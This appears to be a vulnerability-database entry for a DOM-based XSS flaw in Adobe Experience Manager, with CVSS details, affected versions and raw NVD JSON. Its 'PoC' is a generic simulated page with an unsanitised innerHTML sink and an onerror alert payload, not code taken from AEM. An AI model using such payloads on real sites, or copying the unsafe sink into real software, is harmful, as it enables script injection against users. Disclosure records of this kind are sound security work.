Security Vulnerability Report
CVE-2026-27288 CVSS 5.4 MEDIUM

CVE-2026-27288

Published: 2026-04-14 18:16:56
Last Modified: 2026-04-15 19:46:12

Description

Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.24 and earlier
Adobe Experience Manager FP11.7 and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!--
  Proof of Concept for DOM-based XSS in Adobe Experience Manager
  Scenario: The vulnerable page takes a parameter from the URL and
  reflects it into the DOM without sanitization.
-->
<html>
<body>
  <h2>AEM Vulnerable Page Component Simulation</h2>
  <div id="user-content">Loading...</div>
  <script>
    // Simulate the vulnerable logic found in the AEM component
    // In a real scenario, this might be parsing a hash or query param for configuration
    function initPage() {
      var params = new URLSearchParams(window.location.search);
      var userInput = params.get('config');
      if (userInput) {
        // VULNERABILITY: Directly inserting user input into innerHTML
        document.getElementById('user-content').innerHTML = "Config: " + userInput;
      } else {
        document.getElementById('user-content').innerHTML = "No config provided.";
      }
    }
    initPage();
  </script>
</body>
</html>
<!--
  Usage Example:
  Attacker sends link: http://victim-site/vulnerable-page.html?config=<img src=x onerror=alert('XSS')>
  Result: Victim sees an alert box executing JavaScript.
-->
```

References

https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-27288",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T18:16:56.450",
    "lastModified": "2026-04-15T19:46:11.643",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*",
                "versionEndIncluding": "6.5.24.0",
                "matchCriteriaId": "5898EACB-FA50-4AED-9248-9D4FBFD558D9"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:*",
                "versionEndExcluding": "6.5.11.8",
                "matchCriteriaId": "CE7B652E-C71C-42E0-950D-59CABCE683CE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```